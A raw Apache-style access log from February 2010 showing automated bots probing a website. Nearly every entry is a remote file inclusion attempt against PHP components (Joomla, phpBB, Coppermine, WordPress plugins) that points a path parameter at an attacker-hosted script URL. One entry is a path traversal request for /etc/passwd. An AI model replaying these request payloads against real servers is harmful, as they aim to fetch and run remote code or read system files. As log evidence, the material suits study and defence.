81.176.226.164 - - [08/Feb/2010:08:13:54 -0800] "GET /logs//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:13:54 -0800] "GET /logs/access_100112.log%20%20//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:13:56 -0800] "GET /include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:14:00 -0800] "GET /logs//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:14:00 -0800] "GET /logs/access_100112.log//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:14:02 -0800] "GET /include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:14:13 -0800] "GET /logs/access_100112.log//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:14:13 -0800] "GET /logs//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:14:23 -0800] "GET /logs//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:14:23 -0800] "GET /include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:14:23 -0800] "GET /logs/access_100112.log%20%20//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:14:44 -0800] "GET /logs/access_100104.log%20%20//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:14:51 -0800] "GET /logs/access_100112.log//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:14:51 -0800] "GET /logs//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:14:51 -0800] "GET /include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:14:53 -0800] "GET /home.php?content=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:14:53 -0800] "GET /logs/home.php?content=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:15:00 -0800] "GET /logs/access_100104.log//include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:08:15:14 -0800] "GET /logs/access_100126.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:15:38 -0800] "GET /logs/access_100119.log%20%20/home.php?content=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:15:43 -0800] "GET /logs/home.php?content=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:15:43 -0800] "GET /logs/access_100119.log%20%20/home.php?content=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:15:43 -0800] "GET /home.php?content=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:16:03 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:16:03 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:16:04 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:16:06 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:16:06 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:16:07 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:16:10 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:16:10 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:16:10 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:16:11 -0800] "GET /htmltonuke.php?filnavn=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:16:11 -0800] "GET /logs/access_100103.log%20%20/htmltonuke.php?filnavn=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:16:11 -0800] "GET /logs/htmltonuke.php?filnavn=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.115.84 - - [08/Feb/2010:08:16:28 -0800] "GET / HTTP/1.0" 200 13498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.atesh.info"
67.195.115.84 - - [08/Feb/2010:08:16:28 -0800] "GET /atesh_info/ai.css HTTP/1.0" 200 487 "http://www.atesh.info/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.atesh.info"
220.80.108.81 - - [08/Feb/2010:08:16:29 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:08:16:39 -0800] "GET /logs/access_100201.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:17:47 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:17:47 -0800] "GET /logs/access_100112.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:17:47 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:03 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:03 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:03 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:06 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:06 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:06 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:10 -0800] "GET /logs/access_100112.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:10 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:10 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:11 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:11 -0800] "GET /logs/access_100112.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:11 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:14 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:14 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:14 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:17 -0800] "GET /logs/access_100112.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:17 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:17 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:25 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:25 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:25 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:31 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:32 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:44 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:08:18:54 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:19:25 -0800] "GET /memo_delete.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:19:25 -0800] "GET /logs/access_100129.log//memo_delete.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:19:30 -0800] "GET /logs//memo_delete.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:19:35 -0800] "GET /logs/access_100202.log//memo_delete.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:19:44 -0800] "GET /logs/access_100119.log/home.php?content=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:20:05 -0800] "GET /logs/access_100119.log/home.php?content=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:20:29 -0800] "GET /logs/access_100103.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.90.101.2 - - [08/Feb/2010:08:22:07 -0800] "GET /?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3642 "-" "libwww-perl/5.822" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:08:22:11 -0800] "GET /logs/access_100129.log/?sourcedir=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:08:22:11 -0800] "GET /?sourcedir=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:08:22:12 -0800] "GET /logs/access_100201.log/?sourcedir=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:08:22:12 -0800] "GET /logs/?sourcedir=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 200 4942 "-" "libwww-perl/5.803" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:22:24 -0800] "GET /logs/access_100103.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:22:36 -0800] "GET /logs/access_100103.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:22:41 -0800] "GET /logs//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:22:46 -0800] "GET /logs/access_100202.log//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:22:46 -0800] "GET /delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:22:59 -0800] "GET /logs/access_100130.log//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:23:55 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:23:55 -0800] "GET /logs/access.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:23:55 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:26:30 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.252.242 - - [08/Feb/2010:08:26:51 -0800] "GET / HTTP/1.1" 302 5 "-" "Yandex/1.01.001 (compatible; Win16; I)" "simple.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:26:57 -0800] "GET /logs/access_100107.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:28:23 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:28:23 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:28:23 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:30:13 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:30:13 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:30:13 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:30:24 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:30:24 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:30:24 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:30:31 -0800] "GET /logs//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:30:31 -0800] "GET /logs/access_100201.log%20%20//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:30:31 -0800] "GET /includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:08:31:24 -0800] "GET /logs/access_100103.log//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:31:24 -0800] "GET /logs/access_100112.log%20%20//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:31:26 -0800] "GET /logs/access_100103.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.138.32.230 - - [08/Feb/2010:08:31:40 -0800] "GET /logs/access_100122.log///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://igedermateryal.org/gelendosyalar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.138.32.230 - - [08/Feb/2010:08:31:40 -0800] "GET /logs/access_100202.log///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://igedermateryal.org/gelendosyalar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:08:31:50 -0800] "GET /logs/access_100201.log//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [08/Feb/2010:08:31:53 -0800] "GET /logs/access_100112.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.108.61.176 - - [08/Feb/2010:08:31:54 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.108.61.176 - - [08/Feb/2010:08:31:54 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:31:56 -0800] "GET /logs/access_100103.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:32:02 -0800] "GET /logs/access_100202.log/////delete_comment.php?board_skin_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:32:02 -0800] "GET ////delete_comment.php?board_skin_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
